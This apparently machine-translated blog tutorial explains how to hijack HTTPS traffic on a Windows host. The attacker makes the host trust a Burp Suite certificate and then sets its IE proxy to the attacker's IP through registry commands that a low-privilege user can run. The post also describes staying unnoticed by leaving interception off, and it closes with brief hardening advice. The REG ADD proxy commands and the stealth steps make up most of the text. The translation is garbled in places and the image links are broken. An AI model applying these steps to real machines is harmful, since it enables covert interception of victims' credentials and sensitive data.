Man-in-the-middle attack hijacking HTTPS plaintext data

The safe transmission of sensitive data is an important part of network security technology, most think that only HTTPS is the best practice, regardless of the price of SSL certificate, at least HTTPS is not absolutely secure, when the man-in-the-middle hijacking attack will also obtain the transmission of plaintext data, the specific attack principle see " HTTPS connection process and man-in-the-middle attack hijacking, but this article also says that using a man-in-the-middle attack means that the client must trust the middleman's certificate or the attack is invalid. So this attack mode is difficult and inconvenient to attack, but it is not to say that cannot be achieved. The individual believes that there are at least two ways to make use of:
One, after obtaining the Remote Desktop logon permission of the server, set the client to trust the middleman's certificate!
Second, use a physical attack, get to the attacker's computer, set the client to trust the man-in-the-middle certificate

1.1.1 Setting up the Client Trust middleman certificate

The middleman here, we use burpsuite, and then achieve this time an HTTPS hijacking attack. First we need the client (the attacker's computer) to trust the Burpsuite certificate, that is, to install the Burpsuite CA certificate, the configuration is described in the official configuration.

1.1.2 Attack conditions

By thinking we found that the current use of the existence of a certain limit, let's understand that the technology is not enough. The attack condition mainly has the following aspects:
First, the server needs to be a Windows host.
Second, the attacker needs to have a separate external network host (or the same LAN).
Third, have Remote Desktop control of the server, or temporarily have the attacker's computer.
For the third condition, a simple description of the Remote Desktop control of the server, does not have access to the application system of sensitive data or data in the database, for example, you in a site (only a landing page) detected a command execution vulnerability, you can execute commands, but the permissions are not very high (even if the permissions are high, Unless you are only interested in server control and not on sensitive data in your application, we can use this attack mode now!

Introduction to 1.1.3 Experimental environment

Operating system: Microsoft Windows Server R2 enterprise,ip:192.168.1.25
User Rights group: *users
Use tool: Burpsuite
Attacker ip:192.168.1.200

1.1.4 Configuring Attackers Burpsuite

Since we are going to get the packets transmitted by the attackers, and the attackers are often in the intranet, the extranet access is mostly mapped out, so we set up our Burpsuite proxy for any IP packets coming over, as shown in:

1.1.5 set the attacker's IE proxy

If you can enter the desktop environment, you can set up the IE proxy through a graphical interface, as shown in:

If you can't get to the remote Desktop, we can use the following command to set up IE Proxy:
"//Open Agent!
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"/V proxyenable/t reg_dword/d/F
Set the proxy IP and port, for the attacker's IP, port and burpsuite settings consistent!
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"/V proxyserver/d "192.168.1.200:8080"/F
You can use the following command to turn off the set of agents:
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"/V proxyenable/t reg_dword/d 0/f

The    above command has been tested as long as the users user group can execute successfully, as shown in order to make it easier for us to write open and closed commands as bat batch files. [] (http://i2.51cto.com/images/blog/201805/01/d71eebe50b65029774def69fc80b95fe.png?x-oss-process=image/ watermark,size_16,text_qduxq1rp5y2a5a6i,color_ffffff,t_100,g_se,x_10,y_10,shadow_90,type_zmfuz3pozw5nagvpdgk=) # # 1.1.6 Get hijacked plaintext data    in order not to let the attacker suspect, we do not turn on the truncation function as shown in:! [] (http://i2.51cto.com/images/blog/201805/01/a174d0ddcf6fbdd7b3188ed0e6e5ee82.png?x-oss-process=image/ watermark,size_16,text_qduxq1rp5y2a5a6i,color_ffffff,t_100,g_se,x_10,y_10,shadow_90,type_zmfuz3pozw5nagvpdgk=)    now attackers only need to wait for the attacker to use the browser to access the relevant website, even the HTTPS site we can also hijack the plaintext data, as shown in:! [] (http://i2.51cto.com/images/blog/201805/01/fbe03e8f88f484283ce0aeec96f4d1f7.png?x-oss-process=image/ watermark,size_16,text_qduxq1rp5y2a5a6i,color_ffffff,t_100,g_se,x_10,y_10,shadow_90,type_zmfuz3pozw5nagvpdgk=) # # 1.1.7 Summary and repair suggestions    In addition, if it is only HTTP Web site, the above attack difficulty and harm will greatly increase, because do not need to set the client to trust the intermediary certificate this link, only need to set the client agent can, And this one can use the method of fishing to turn on the agent function to spread the tool, or onlyNeed a simple command to execute the shell, normal permissions can! Fix recommendations refer to the following:   one, the server security hardening, to prevent the use of server vulnerabilities to attack!    Second, set the browser do not use the default system agent, IE global Agent!    third, to enhance safety awareness, when leaving the computer to remember to set the password lock screen, borrow the computer for others to use when possible in the side, the use of the completion of check if there is an abnormality!

Hijack HTTPS plaintext data for man-in-the-middle attacks